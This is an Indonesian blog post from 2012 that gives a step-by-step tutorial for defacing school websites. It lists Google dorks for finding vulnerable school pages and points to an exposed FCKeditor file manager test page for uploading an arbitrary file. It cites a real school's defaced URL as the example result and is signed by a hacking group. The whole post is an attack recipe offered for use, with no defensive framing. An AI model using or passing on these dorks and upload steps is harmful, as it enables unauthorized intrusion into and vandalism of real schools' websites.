Deface Website Sekolah

Posted by : M.Rabbani Anugrah Jumat, 15 Juni 2012




1. Siapkan file txt.

2. Dork:
  • inurl:/html/siswa.php? 
  • inurl:/html/alumni.php?
  • inurl:/html/guru.php?
3. Exploit: /editor/filemanager/connectors/test.html (lalu, copas ini)


EX:
  • http://xxx.sch.id/html/siswa.php
  • http://xxx.sch.id/html/almni.php
  • http://xxx.sch.id/html/guru.php
*Sesuai Dork.

Ganti jadi: http://xxxx/editor/f...ctors/test.html

4. Ganti ASP jadi PHP.
5. Browse file txt yang sudah disiapkan -> open -> upload.
6. Hasilnya: http://xxx.sch.id/userfiles/file/nama-file.txt

Contoh hasil : http://sman1kotabaru.sch.id/userfiles/file/deface-=JEC=-.txt
Tutorial Video :

By : Ian Wyvern

-=JECNonymous=-







Leave a Reply

Subscribe to Posts | Subscribe to Comments

Welcome to My Blog

Popular Post

Followers

Total Pengunjung

Archive

- Copyright © 2013 Line Software -Robotic Notes- Powered by Blogger - Designed by Johanes Djogan -